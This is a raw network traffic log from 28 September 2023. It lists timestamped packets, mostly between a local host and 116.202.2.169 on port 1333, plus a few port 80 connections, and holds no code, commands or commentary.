Sep 28, 2023 06:02:00.071147919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071166039 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071186066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071203947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071223021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071235895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071249008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071258068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071274042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071274996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071295977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071316957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071434021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071449995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071472883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071481943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071495056 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071511030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071522951 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071527004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071552992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071564913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071584940 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071624041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071789026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071830034 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071840048 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071852922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071877003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071880102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071894884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071913004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071916103 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071949959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071958065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071996927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072002888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072040081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072108030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072120905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072135925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072146893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072149992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072165012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072165966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072180033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072185993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072194099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072206020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072210073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072232962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072237015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072254896 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072269917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072283030 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072309971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072338104 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072376013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072402954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072417021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072446108 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072459936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072470903 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072484016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072506905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072511911 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072524071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072531939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072550058 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072567940 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072580099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072607040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072623968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072643042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072650909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072665930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072690964 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072700977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072705984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072737932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072762966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072803020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072818041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072856903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072863102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072879076 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072911978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072923899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072928905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.072968006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.072994947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073020935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073035002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073061943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073064089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073101997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073131084 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073148966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073174953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073194027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073194027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073209047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073225021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073235035 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073255062 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073261023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073272943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073288918 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073302984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073328972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073339939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073364973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073379993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073405981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073406935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073450089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073477030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073493004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073515892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073519945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073532104 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073539972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073544979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073553085 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073559046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073574066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073595047 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073633909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073647976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073673010 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073674917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073698997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073702097 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073713064 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073721886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073726892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073740959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073755980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073760986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073779106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073797941 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073802948 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073817968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073829889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073846102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073864937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073864937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073893070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073908091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073930025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073935032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073966026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.073970079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.073981047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074006081 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074012041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074028015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074039936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074089050 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074125051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074151993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074177980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074187994 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074212074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074225903 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074259996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074266911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074280977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074302912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074323893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074326038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074342012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074354887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074366093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074388027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074496031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074534893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074563980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074604988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074630976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074645042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074668884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074687004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074757099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074794054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074805021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074839115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074867964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074884892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.074911118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.074930906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075192928 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075229883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075242043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075277090 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075298071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075311899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075333118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075347900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075351954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075381994 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075400114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075413942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075429916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.075438023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075455904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.075475931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.123148918 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:02:00.123249054 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:02:00.242073059 CEST	80	49816	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.246979952 CEST	80	49816	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.247056961 CEST	49816	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.248187065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.248250961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.248977900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249032021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249118090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249161005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249178886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249214888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249285936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249321938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249335051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249360085 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249361038 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249398947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249432087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249468088 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249471903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249505043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249509096 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249545097 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249604940 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249640942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249644041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249679089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249680996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249732018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249790907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249830961 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249835968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249870062 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.249933004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249969006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.249980927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.250009060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.250088930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.250147104 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.250643969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.250698090 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.250783920 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.250838041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.250969887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251020908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251141071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251198053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251301050 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251355886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251483917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251543045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251638889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251677990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251699924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251718044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251810074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251846075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251868010 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251884937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.251898050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251934052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.251986027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252034903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252167940 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252209902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252230883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252250910 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252311945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252348900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252361059 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252399921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252497911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252554893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252685070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252744913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252849102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252887011 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.252906084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.252932072 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253015995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253051996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253067970 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253094912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253175020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253215075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253230095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253252029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253256083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253293037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253354073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253390074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253402948 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253431082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253521919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253576040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253670931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253711939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253726959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253752947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253837109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.253887892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.253973961 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254009962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254028082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254050016 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254149914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254190922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254205942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254228115 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254231930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254277945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254331112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254368067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254388094 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254405022 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254407883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254447937 CEST	49810	1333	192.168.2.3	116.202.2.169
